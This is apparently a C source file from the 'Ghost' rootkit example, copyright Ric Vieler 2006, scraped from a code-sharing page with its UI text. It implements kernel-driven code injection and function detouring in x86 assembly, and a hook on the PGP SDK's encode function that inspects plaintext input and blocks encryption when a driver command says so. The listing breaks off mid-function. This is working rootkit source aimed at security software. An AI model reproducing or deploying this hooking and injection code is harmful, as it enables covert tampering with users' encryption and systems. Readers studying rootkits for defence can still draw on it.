?? injectmanager.c
字號:
// injectManager
// Copyright Ric Vieler, 2006
// Hook Dynamic Link Libraries
#include "ntddk.h"
#include "Ghost.h"
#include "hookManager.h"
#include "injectManager.h"
#include "IoManager.h"
#include "parse86.h"
#include <stdarg.h>
#include <stdio.h>
#pragma code_seg("PAGE")
#pragma optimize( "", off )
extern PVOID kernel32Base;
static void HookTable( void );
static void DetourFunction( void );
static void EndOfInjectedCode( void );
static DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData );
static DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData );
static void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData );
#define JUMP_TO_DETOUR_LOCATION -5
#define CALLDATA_INDEX_LOCATION 0
#define CALLDATA_PARAMETERS_LOCATION 4
#define CALLDATA_CALLTYPE_LOCATION 8
#define CALLDATA_STACK_OFFSET_LOCATION 12
#define TRAMPOLINE_LOCATION 16
#define START_OF_TRAMPOLINE_PATTERN -1
void __declspec(naked) HookTable( void )
{
__asm
{
push eax
xor eax, eax
call phoney_call
phoney_call:
lea eax, phoney_call
lea edx, phoney_jump
sub edx, eax
pop eax
add eax, edx
mov edx, eax
pop eax
jmp DetourFunction
phoney_jump:
EMIT_FOUR( 0xff )
EMIT_FOUR( 0x0 )
EMIT_FOUR( 0x0 )
EMIT_FOUR( 0x0 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
EMIT_FOUR( 0x90 )
jmp EndOfInjectedCode
}
}
////////////////////////////////
// Injected functions
////////////////////////////////
void __declspec(naked) DetourFunction( void )
{
PUSH_STACKFRAME();
{
DWORD hookIndex;
DWORD parameters;
DWORD callType;
DWORD stackOffset;
PCHAR trampolineFunction;
IN_PROCESS_DATA* callData;
PCHAR codeStart;
PDWORD originalStack;
DWORD tempStack;
int loop;
int parameters4return;
DWORD parameter2return = 0;
DWORD continueFlag;
DWORD register_esp;
DWORD register_edi;
DWORD register_esi;
DWORD register_eax;
DWORD register_ebx;
DWORD register_ecx;
DWORD add2stack;
// setup to call injected functions
__asm
{
mov register_esp, esp
mov register_edi, edi
mov register_esi, esi
mov register_eax, eax
mov register_ebx, ebx
mov register_ecx, ecx
// get parameters
push edx
mov edx, [edx+CALLDATA_INDEX_LOCATION]
mov hookIndex, edx
pop edx
push edx
mov edx, [edx+CALLDATA_PARAMETERS_LOCATION]
mov parameters, edx
pop edx
push edx
mov edx, [edx+CALLDATA_CALLTYPE_LOCATION]
mov callType, edx
pop edx
push edx
mov edx, [edx+CALLDATA_STACK_OFFSET_LOCATION]
mov stackOffset, edx
pop edx
push edx
add edx, TRAMPOLINE_LOCATION
mov trampolineFunction, edx
pop edx
// caculate the start address
xor eax, eax
call called_without_return
called_without_return:
pop eax
lea ebx, DetourFunction
lea ecx, called_without_return
sub ecx, ebx
sub eax, ecx
mov codeStart, eax
// data area
lea ecx, EndOfInjectedCode
sub ecx, ebx
add ecx, eax
mov callData, ecx
// caculate the last ret address
mov eax, ebp
add eax, 4 // pushed ebp
add eax, stackOffset
mov originalStack, eax
}
// setup return call type
if( callType == CDECL_TYPE )
add2stack = parameters * sizeof( DWORD );
else
add2stack = 0;
// call pre-injected code
continueFlag = BeforeOriginalFunction( hookIndex, originalStack, ¶meter2return, callData );
if( continueFlag == (DWORD)TRUE )
{
for( loop = parameters; loop > 0; loop-- )
{
tempStack = originalStack[loop];
__asm push tempStack
}
// Call trampoline (jumps to original function)
//
// Since trampoline is a jump, the return in
// the original function will come back here.
__asm
{
lea ebx, DetourFunction
lea eax, return_from_trampoline
sub eax, ebx
add eax, codeStart
// construct call
push eax
// adjust stack
sub esp, stackOffset
// restore registers and call
mov edi, register_edi
mov esi, register_esi
mov eax, register_eax
mov ebx, register_ebx
mov ecx, register_ecx
jmp trampolineFunction
return_from_trampoline:
add esp, add2stack
mov parameter2return, eax
}
// call post-injected code
AfterOriginalFunction( hookIndex, originalStack, ¶meter2return, callData );
}
// prepare to return
tempStack = *originalStack;
if( callType == CDECL_TYPE )
parameters4return = 0;
else
parameters4return = parameters;
__asm
{
mov eax, parameter2return
mov ecx, tempStack
mov edx, parameters4return
shl edx, 2
add edx, stackOffset
POP_STACKFRAME();
add esp, 4
add esp, edx
jmp ecx
}
__asm mov edx, trampolineFunction
}
POP_STACKFRAME();
__asm jmp edx
}
///////////////////////////////////////////////////////////////
// this function is located in the PGP SDK
// dynamic link library (old=PGP_SDK.DLL, new=PGPsdk.dll)
// This function accepts the callers input and output,
// which may be memory or file based, and converts the input
// into encrypted output
//
// return TRUE to allow encryption
// return FALSE to block encryption
///////////////////////////////////////////////////////////////
DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData )
{
void* contextPtr = (void*)stack[1];
PGPOptionList* optionListPtr = (PGPOptionList*)stack[2];
DWORD dwRet = (DWORD)TRUE;
int index;
int inputType = 0;
void* lpBuffer;
DWORD dwInBufferLen = 0;
PGPOption* currentOption = optionListPtr->options;
PFLFileSpec* fileSpec;
HANDLE deviceHandle;
GHOST_IOCTLDATA control = { 0 };
ULONG status = 0;
// Look at the options in the option list
for( index = 0; index < optionListPtr->numOptions; index++)
{
if( currentOption->type == 1 )
{
// File Input
inputType = 1;
fileSpec = (PFLFileSpec*)currentOption->value;
lpBuffer = fileSpec->data;
dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer));
break;
}
else if( currentOption->type == 2 )
{
// Buffer Input
inputType = 2;
lpBuffer = (void*)currentOption->value;
dwInBufferLen = (DWORD)currentOption->valueSize;
break;
}
currentOption++;
}
// Process buffer or file before encryption
if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))
{
deviceHandle = pCallData->pCreateFileA( pCallData->deviceString,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (deviceHandle != INVALID_HANDLE_VALUE)
{
if( pCallData->pDeviceIoControl( deviceHandle,
GHOST_STATUS_COMMAND,
&control,
sizeof(control), // input
(PVOID)&control,
sizeof(control), // output
&status,
NULL ) )
{
if(control.command == GHOST_ON)
{
// blocking encryption
dwRet = (DWORD)FALSE;
*callbackReturn = PGP_BAD_API;
pCallData->pOutputDebugStringA(pCallData->denyString);
}
else
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -